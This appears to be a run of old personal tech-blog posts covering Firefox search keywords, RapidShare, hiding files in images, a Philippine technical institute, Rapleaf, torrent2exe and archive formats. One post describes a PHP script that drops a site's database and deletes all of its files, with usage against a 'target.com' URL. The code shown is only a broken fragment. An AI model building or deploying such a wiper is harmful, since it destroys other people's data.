I used a text-to-speech reader for this video. This video shows you how to use the “Add a Keyword for this search” on firefox. When visiting your favorite search engine you’ll always probably do the common way of querying your search. Step 1, you’ll be typing the url on the adress bar. Step 2, you’ll query your search and press the go button.
Both of these tasks could be done at the same time. By making your own keyword for a search engine, you could enter your query alongside with it on the address bar . E.g. (g technology), It queries technology on google’s search engine and gives you the results. You could do this on any website that has a search form. Remember your keywords and organize those bookmarks. Happy searching!

Most of us are aware that rapidhsare.com changed their captcha method. Out of 7 characters, you just need to enter four of them. The four characters have cats in them while the 3 have dogs. Here is a screenshot of the said insanity:
Well if you download heaps of files from rapidshare everyday and you’re just a free user, you don’t want to keep on repeating this verification when you fail. It just makes me think that they are forcing people to buy premium accounts. Thank goodness they activated rapidshare happy hours again. I found this program on the net. It is called rapidshare happy hour checker:
You could get it here. Ironically it is uploaded at rapidshare.com. It is very easy to use. The program sits on your system tray and the icon turns green when happy hours is activated. The program is tested and it works only during happy hours.

Do you have important files and just want to hide it from your brothers/sisters. You could buy some stenography software online which does this for you using their GUI interface. Or, simply use the built-in commands in your windows system to accomplish such task. You will not spend any money buying some software or need to be some geek like your neighbor. Just lend me 5 minutes of your time and watch my first video tutorial.
In this video, I would show you the exact steps of hiding your files into a wallpaper. How did this happen? We just need to remember the good old COPY command that’s with DOS for some years. The COPY command has a /B option. This option is used to copy binary files along with our + symbol to combine these two files together. What is a binary file? a binary file is a computer file encoded in binary form.
This looks easy, but did you ever wonder why companies spend time making software to do this? Well, not all file formats are supported by the COPY /B command. In fact, they are only available to binary files. So far, I have tested this with .mp3, .jpg, and the .gif format. However, if you want to add unsupported file types you could always compress these files into a .zip or .rar. Then, It’ll be a binary file which you could add to your picture. Remember, large files need large pictures in order for them to live.

The Meralco Foundation Institute is another college that is unknown to Filipino masses. It is located at Ortigas Ave. Extension Pasig City beside the new Medical City Hospital. It was founded November 6, 1973. This school came to my attention when my sister told me of a friend’s friend studying at Meralco. Meralco is known as the largest electricity distributor here in the Philippines and that’s actually what all people know. I was a bit shocked that Meralco owns an institute. They offer technical and agricultural courses especially for the less privileged. I could describe MFI as a low-profile school offering high-class courses. I am not from MFI and I am not endorsing it. It’s just that courses offered at this school looks promising and It was already MFI when I was still void.
I am a computer science student at Far Eastern University - East Asia College. But, I admit that MFI beats EAC when it comes to the courses offered. These are just some of the courses offered at MFI under Information Technology:Digital Imaging with Adobe Photoshop, Enhanced Web Page Designing in HTML and Javascript, Fundamentals of VoIP & Securing and Maintaining VoIP Networks, Network Technology, Object-Oriented Programming in C++, Office 2000, PHP and MySQL Basics, Program Logic Formulation, Programming in C++, SAP Business One ICC, SAP Business One Logistics and Financials, Structure Programming in C++, Administering Windows 2003 Network Infrastructure, Administering Windows 2003 Networks, CCNA Exploration - Accessing the WAN, CCNA Exploration - LAN Switching and Wireless, CCNA Exploration - Networking Fundamentals, CCNA Exploration - Routing Protocols and Concepts, and Fundamentals of Network Security: Router. They also offer specialized courses, the full list can be found here.
You’ll definitely learn all this things in the span of 2 years getting away with your minor subjects like values education and the likes. MFI has a high-profile when it comes to industry. You could get jobs easily when you are an MFI graduate according to Adolf Gumera. Gumera graduated last October 2007 at MFI and is now working at J.Ray Mcdermott, Dubai, U.A.E as a technician of an automatic welding system having 100 dollars starting salary. This is a link to his profile on friendster.
According to the students of MFI, most of them are scholars of the Institute. I don’t have much details about the inside system of the school. But, looking at their small website, I realized that this school should be known to people. They offer high-quality education and is operating for almost 35 years. They also offer agricultural course and industrial courses.

Social networking sites like Friendster and the likes are the most visited sites here in the Philippines. It is not only famous to the students but also to their professors. While these social sites offer communication for your long lost friends and relatives abroad. Our identity is just a search away on our favorite search engine, Google.
A part of registration is your email and serves as a verification tool for signing up online. During my highschool days, I signed up for countless social sites including Friendster. On our profile, be it private or public, anyone could gather basic information and use it against us. That includes our name, location, hometown, age and our face!
We may enjoy these services, but we are wrecking the joys of our privacy. By simply typing your email online you could have a good number of links your profile. However, it will take time to gather those information and bookmark all the sites that you’ve subscribed. I would like to introduce to you rapleaf.com.
While I was googling my name I saw this site. It indexes all those social networks and gathers all information about you through the use of bots. This is a good evidence that anyone could lookup your email and gather information about you.
This is a screenshot of my own profile at rapleaf. They made this profile and I just realized how careless I am about my privacy.The good news is, Rapleaf.com offers you to manage your privacy while they continue to search all searchable information about you that is available on the internet. With his service, you will not spend your time looking for them one by one and completely clean up all your trails.

How does it feel to explain how torrents work for someone who just knows how to download from download.com? If you’re a geek, I think you get what I mean. There are definitely numbers of ways to retrieve and share files across the internet. If you have those hundred MB files, you would visit mediafire, xdrive and the famous rapidshare.
But, being a hardcore downloader or a warez fanatic i could say. You would go for p2p (peer-to-peer) clients, ftp protocols, and do away with http transfers. The torrent technology comes to the scene. The BitTorrent protocol was designed by Bram Cohen in April 2001. This was a new protocol for the p2p community which is definitely enjoyed by people today.
Download sections on websites have these large files to share, ranging from 200 mb , 700 mb to gigabyte sized files. I could take linux distro sites as an example. You could download their live cd and live dvd’s through torrent clients. Most websites, prefer to use this method to share their huge files to the world.
What is the advantage of using such method rather than settling with the old http transfer? Originally, the HTTP protocol was designed for webpages and not for downloads that takes hours to finish. With this protocol, there is less strain that’s happening to the server side which host these files. Although, they still need to host the files, there will be small data request across different TCP sockets that runs and downloads the torrent with their torrent clients. The more people are downloading, the faster your torrent goes. This is contrary to HTTP transfers, which splits up down stream speeds with reference to the number of users connected at the same time.
An ordinary end-user knows only limited file types when it comes to softwares and installations. That is obviously the “.exe” or an executable. There are many torrent sites across the internet. And if you’re one of these people, you would think that torrents are just hoax downloads. They claim to have a size of 5 gigabytes, but you downloaded it for less than a second.
A bit torrent file (*.torrent) contains information about the piece structure of the download. Which is then interpreted by your torrent client. How could you explain these complexities to an ordinary user? Then, why not just give him/her an “.exe” file and throw away those .torrent.
Don’t get me wrong here, you could actually convert a .torrent file into an executable file. I had this thoughts long time ago. But, i never realized that this really existed. Let me introduce to you torrent2exe. This webscript converts your .torrent files into an executable file that leaves you no hassles in setting up a torrent client when your on the go.
How to use: 1. You could go visit their site and upload your recently downloaded torrent and press the start download button.
Step 1: Go to http://btjunkie.org/ or any other torrent sites and download your favorite torrent.
Step 2: Go to http://torrent2exe.com/ and upload your downloaded torrent.
Step 3: Click “start download” and save it on your computer
Step 4: You may now double-click the exe and start downloading.
2. Another way is directly appending the URL of the torrent file into their script. Here is how: http://torrent2exe.com/scripts/get_exe.php?url=URLOFTORRENTFILE
Step 1: Go to http://btjunkie.org/ or any other torrent sites.
Step 2: Right-click the download button or image and choose the options that is available for your browser (IE: copy shortcut , Firefox: copy link location).
Step 3: Append the URL to the end of this URL
“http://torrent2exe.com/scripts/get_exe.php?url=”. Here is an example.
http://torrent2exe.com/scripts/get_exe.php?url=http://www.torrent.com/ codcutters.torrent.
Step 4: Paste it on your browser to start the conversion and save it on your computer.
Step 5: You may now double-click the exe and start downloading.

NOTE: This script shall collapse your database and file system in seconds.
How does it work?
It will DROP the database specified. After dropping the database, all files in the root directory specified will be unmasked to chmod(0777) this is a unix command to set file permissions to read,write and execute file. Having the permissions, all files will be deleted leaving no trace.
How to use?
1. Upload file to your website save it as “filename.php” (you can place it anywhere)
2. To run the script, here is an example. http://www.target.com/filenam.php?uname=admin&pwd=god&host=localhost&r oot=target.com/&dbase=users
All files deleted will be listed.
NOTE: Do not hardcode the variable passed to the PHP script, this could be accidentally executed by indexing bots.
<?php
$host = $HTTP_GET_VARS["host"];
$username = $HTTP_GET_VARS["uname"];
$password = $HTTP_GET_VARS["password"];
$root = $HTTP_GET_VARS["dir"];
$conn = mysql_connect($host, $username, $passowrd);
$destroy = $HTTP_GET_VARS["dbase"];
if (!$conn)
{
echo"Unable to connect to DB: ".mysql_error();
exit;
}

An archive file is a file that is composed of one or more files along with metadata that can include source volume and medium information, file directory structure, error detection and recovery information, file comments, and usually employs some form of lossless compression. Archive files may also be encrypted in part or as a whole. Archive files are used to collect multiple data files together into a single file for easier portability and storage (Retrieved May 21, 2008, from Archive file - Wikipedia, the free encyclopedia Web site: http://en.wikipedia.org/wiki/Archive_file)
To Make It Short it’s something similar to a folder that contains files only this time you will need another application to access those files.
These are the extension of common archive files. If you bumped in to one and can’t open it go to the links I provided and download the application for that file type
Note on Z01 and R01 file extensions – files with these extensions are called Split Compressed Archives; these files usually come with other files such as a .ZIP, .Z02, .Z03 for split ZIP files and .RAR, .R02, .R03, for split RAR files. To extract the content of these files, you need to place all the split parts into a single folder, if one archive is missing the archiving software will most likely produce a message telling you that a certain file is not found.
